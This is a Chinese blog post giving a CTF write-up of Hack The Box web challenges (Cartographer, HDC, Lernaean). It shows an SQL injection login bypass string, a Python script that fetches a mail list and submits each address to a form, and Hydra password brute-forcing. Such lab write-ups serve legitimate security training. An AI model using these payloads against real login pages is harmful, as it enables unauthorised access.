hack the box (web)

最新推荐文章于 2024-05-28 10:25:19 发布
最新推荐文章于 2024-05-28 10:25:19 发布
阅读量5.4k 收藏 1
点赞数 3
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_38094687/article/details/79859929
版权

接下来是2道web水题,来自hack the box。这个网站还真是厉害啊,邀请码要靠自己破解网页的一个小trick。话不多说看题。
- Cartographer (30)
- HDC (30)

Cartographer

sql注入大水题
入口
使用username='='&password='='的方式绕过
进入
访问一下info=flag即可得到
flag

HDC

这题分两部分

登录

进入登录界面,看到有个js文件不对劲,jquery-3.2?官方的jquery是用_的,进去查找submit,可以看到明文的name1和name2。进入

email

根据论坛大佬的提示,找到secret_area_路径(来自某图片的索引)发现mails.txt

All good boys are here... hehehehehehe!
----------------------------------------
Peter Punk CallMePink@newmail.com
Nabuchodonosor BabyNavou@mailpost.gr
Ilias Magkakos imagkakos@badmail.com
Nick Pipshow NickTheGreek@mail.tr.gr
Don Quixote Windmill@mail.gr 
Crazy Priest SeVaftise@hotmail.com
Fishroe Salad fishroesalad@mail.com
TaPanta Ola OlaMaziLeme@mail.gr
Laertis George I8aki@mail.gr
Thiseas Sparrow Pirates@mail.gr
Black Dreamer SupaHacka@mail.com
Callme Daddy FuckthemALL@mail.com
Aggeliki Lykolouli FwsStoTounel@Traino.pourxetai
Kompinadoros Yannnnis YannisWith4N@rolf.com
Serafino Titamola Ombrax@mail.gr
Joe Hard Soft@Butter.gr
Bond James MyNameIsBond@JamesBond.com
Endof Text EndOfLine@mail.com

在其他位置有一个提交的页面Diaxirisths.php尝试用一个email发消息,但没回应,估计是要遍历所有email。
写脚本:

# -*- coding = utf8 -*-
import os
import requests
import sys

def getEmail(filename,ip,port):
    url = 'http://%s:%s/main/secret_area_/mails.txt' % (ip, port)
    command = 'curl '+url+' > '+ filename
    if os.path.exists(filename):
        pass
    else:
        os.system(command)
def postData(email,ip,port):
    url = 'http://%s:%s/main/Diaxirisths.php' %(ip,port)
    proxies={
        'http':None,
        'https':None
    }
    data={
        'name1':email,
        'name2':'test',
        'submit':'Send'
    }
    r = requests.post(url,data=data,proxies=proxies)
    if 'flag' in r.text:
        print r.text
    else:
        pass


def readFile(filename, ip, port):
    if os.path.exists(filename):
        with open(filename,'r') as f:
            lines = f.read().splitlines()[2:]
            for line in lines:
                if line[-1] == ' ':
                    line = line[:-1]
                email = str(line.split(' ')[-1:][0])
                postData(email, ip, port)
                print email+' finished.'
                sys.stdout.flush()
        f.close()
if __name__=='__main__':
    filename = 'email.txt'
    if len(sys.argv)<3:
        print 'we need ip and port,check again plz'
    else:
        ip = str(sys.argv[1])
        port = str(sys.argv[2])
        getEmail(filename, ip, port)
        readFile(filename, ip, port)

分别处理了文本并提交。坑点在于第五个email后面有个空格,如何处理\n也是个问题。emmmmm这两部分毫无关系
于是扩展后的脚本传参数<ip> <port>即可得到flag

Lernaean

这题没什么意思,题目搜一下发现是Hydra,然后爆破就行了,时间问题.
跑出密码 leonardo
然后用burp截一下response就能看到flag.

待续

如果觉得我写的可以,还请您关注我的个人静态博客:https://cntjuscswyz.github.io/
ありがとう

黑羽re
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www.hackthebox.eu/invite,查看源代码 发现提示 发现可疑的js文件:/js/inviteapi.min.js   inviteapi  邀请接口 查看该js 在控制台进行调用,给出了提示,
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6529
Hack The Box,一款有意思的渗透测试平台
HackTheBox-Machines--Lame
七天
05-28 318
枚举共享驱动器,并查看权限,发现/tmp目录具有读取和写入权限。使用hydra、medusa等工具进行暴力破解。
HackTheBox靶场系列(一)之HackTheBox靶场简介
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 3363
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可攻击的目标系统。通过攻击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的攻击和防御。
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
Hack The Box 玩转指南:初学者到高手的渗透测试之旅》
2201_75353421的博客
01-30 1783
Hack The Box 实战指南:从注册到成功通关的渗透测试之旅》介绍了在Hack The Box平台上进行渗透测试的全过程。从注册开始,通过连接实验室、生成自己的服务器,一直到成功通关的每一步都得到详细解说。这是一篇适合初学者的实用指南,旨在帮助读者提高渗透测试技能和实际操作经验。
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作
03-20
【标题】"HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作"涉及的是一个网络安全领域的活动,其中“HackTheBox”是一个知名的在线平台,它提供了模拟黑客攻击的环境来提升安全专业人员的技能。CTF(Capture The Flag...
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
在这个领域,两个知名的在线平台是Hackthebox和Vulnhub,它们提供虚拟环境供用户实践和提升渗透测试技能。这份PDF文档作者Joas Antonio分享了一些初学者在接触这些平台时可能会发现有用的技巧和策略。 首先,对于...
平台的核心功能包括: 虚拟靶场: Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
最新发布
06-22
Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到...
hack the box 注册时全名无效、reCapcha validation等注册问题
weixin_68177269的博客
03-12 4030
本篇文章主要记述了在注册hack the box时候遇到的问题及其解决办法。同样可以应用在注册其他外网的情况下。
入坑 Hack The Box
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
HackTheBox 如何使用
网络安全学习
04-14 4635
如何开始? 1.到官网注册一个账号 https://www.hackthebox.com/ 2.验证自己的邮箱 3.下载 openvpn 4.到左边的 labs 实验室开始学习或直接点击 start point 5.点击想要完成的靶机,比如第 0 层的第一个靶机,选择 connnect to htb 选择 openvpn 会自动下载 openvpn 的文件,然后用 openvpn 导入,稍等一下即可连接 在 kali(linux)中如何连接? 同样是执行下载的文件 ┌──(root💀kali)-[~/d
Hack The Box靶场使用流程及方法
z875611510的博客
06-09 4101
协议有两个:UDP1337、TCP443,应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。国内视频介绍(kali连接htb):https://www.bilibili.com/video/BV1Q94y1f73u。以上就是hackthebox靶场的使用和第一关详解,总的来说这个靶场还是基础的,里面的资源也比较丰富,适合安全初学者入门。登录我们的HTB账号,点击右上角的“CONNECT TO HTB”,上面有两个选项,这里选择入门的就行。
第一章 网络安全从实战入门 hack the box
qq_42676415的博客
04-24 633
这会下载一个后缀为ovpn的文件,这个文件就是链接hack the box 的网络文件。(3)输入openvpn (路径)文件名,然后回车开始链接hack the box 的网络。二、我们使用kali系统,这个可以安装虚拟机,网络上教程一大堆,不在手把手教。(不会安装,不知道如何在官网下载的可以私信我)(2)输入sudo -I 命令切换为超级管理员用户。我们利用hack the box 进行教学,官方网址。在终端显示如下后,刷新网页如下右边就是链接成功。三、链接hack the box 的网络。
老实本分——HackTheBox入门
m0_68407377的博客
12-28 809
尽量将VPN接入自己的虚拟机中(kail),不然别人和你使用同一个机器人的时候,会跟你再同一个网段。注意:FULLNAME中间需要一个空格。使用telnet命令来获得flag。账户root,可以不用密码直接进入。页面有指示,可以按照这来。第八个问题获得flag。
手把手教会你--Hack The Box的账号注册(HTB Labs部分)
m0_74317362的博客
11-27 1745
请务必跟着博主复现一遍。
ctfshow web入门
05-14
CTFShow是一个综合性的CTF...在学习过程中,可以结合一些CTF练习平台,如pwnable.kr、hackthebox.eu等进行练习和实战。此外,还可以参考一些优秀的Web安全书籍,如《Web安全深度剖析》、《Web前端黑客技术揭秘》等。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值